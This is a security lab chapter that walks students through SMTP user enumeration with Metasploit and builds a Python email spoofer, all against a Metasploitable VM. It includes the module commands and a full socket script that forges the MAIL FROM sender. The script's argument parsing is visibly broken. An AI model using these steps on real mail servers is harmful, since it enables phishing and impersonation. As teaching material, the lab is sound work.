Chapter 9 SMTP enurmeration & email spoofing
For this lab you are going to attempt to build an email address spoofer that implements the STMP protocol over TCP. Modern Email servers have several solutions to make it more difficult to spoof emails. However, the STMP protocol itself does not check to ensure that the message is coming from a valid server or that email was actually created by the sender. To demonstrate this, we will setup up a metasploitable server.
9.2 SMTP enumeration
In an SMTP enumeration attack an attacker try get a list of valid email addresses from a server. Kali linux has
Step 1 determine the ipaddress of the metasploitable machine using the ipconfig command. Username: msfasdmin password msfadmin
Step 2 Start the metasploit console. Select smtp_enum module by typing the following
msf > use auxiliary/scanner/smtp/smtp_enum
Step 3 Set the host that you want to scan by typing the following. Replace the xxx.xxx.xxx.xxx ip-address with IP-address of the metasploitable machine
msf auxiliary(smtp_enum) > set RHOSTS xxx.xxx.xxx.xxx
RHOSTS => 192.168.1.56
msf auxiliary(smtp_enum) > run
You should see a list of users on the server.
[Include screenshot below]
An attacker could you use an SMTP enumeration attack to get the email address that are available on the server. In the following section we develop software required to execute an SMTP attack.
9.3 Email Spoofing
Step 1. Download the free version of vmplayer. (You can also use virtual box if you already have it installed or just like it more.)
Step 2. Connect to the metasploitable server via telnet.
telnet xxx.xx.xx.x 25
where xx.xx.xx.x is the IP address of the metasploitable server.
Remember that you can get the address of the metasploitable server by login: username msfadmin and password msfadmin
The metasploitable webserver will now let you communicate with it via telnet. (Not encrypted fun for snooping)
Step 3 Follow the STMP communication protocol process to send an email to
Great, now that we have a mailserver that is configured and we can communicate with. Let’s go ahead write a TCP application that will allow us to implement the process for us.
Step 4 Open the ide
The code below shows an implementation of the program that execute the SMTP protocol over a TCP connection
import sys, socket size = 1024 def sendMessage(smtpServer, port, fromAddress, toAddress, message): IP = smtpServer PORT = int(port) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((IP, PORT)) # Open socket on port print(s.recv(size).decode()) # display response s.send(b'HELO virginia.edu\n') # Send HELO fake.fr print(s.recv(size).decode()) # display response s.send(b'MAIL FROM:<' + fromAddress.encode() + b'>\n') # send MAIL FROM: print(s.recv(size).decode()) # display response s.send(b'RCPT TO:<' + toAddress.encode() + b'>\n') # send RCPT TO: print(s.recv(size).decode()) # display response s.send(b"DATA\n") # send DATA print(s.recv(size).decode()) # display response s.send(message.encode() + b'\n') # send message s.send(b'.\n') print(s.recv(size).decode()) # display response s.send(b'QUIT\n') # send QUIT print(s.recv(size).decode()) # display response s.close() def main(args): smtpServer = args port = args fromAddress = args toAddress = args message = args sendMessage(smtpServer, port, fromAddress, toAddress, message) if __name__ == "__main__": main(sys.argv)
Step 5 Create a folder called spoofer on the Kali desktop and save the program above to the folder and call it espoofer.py
Step 6 Open the terminal and cd to ~/Desktop/spoofer
Step 7 Run the spoofer by typing the following commands into the termainal on the shell.
python espoofer.py [IP-Metasploitable] 25 firstname.lastname@example.org sys Hello From the other side
[Include screen shot]
9.4 Checking to see that email was correctly recieved.
Step 1 Login into the metasploitable server. Username: msfadmin Password: msfadmin
Step 2 Open the terminal and check sys mailbox on the mail server by typing
sudo cat /var/spool/mail/sys
[Include a screen shot below]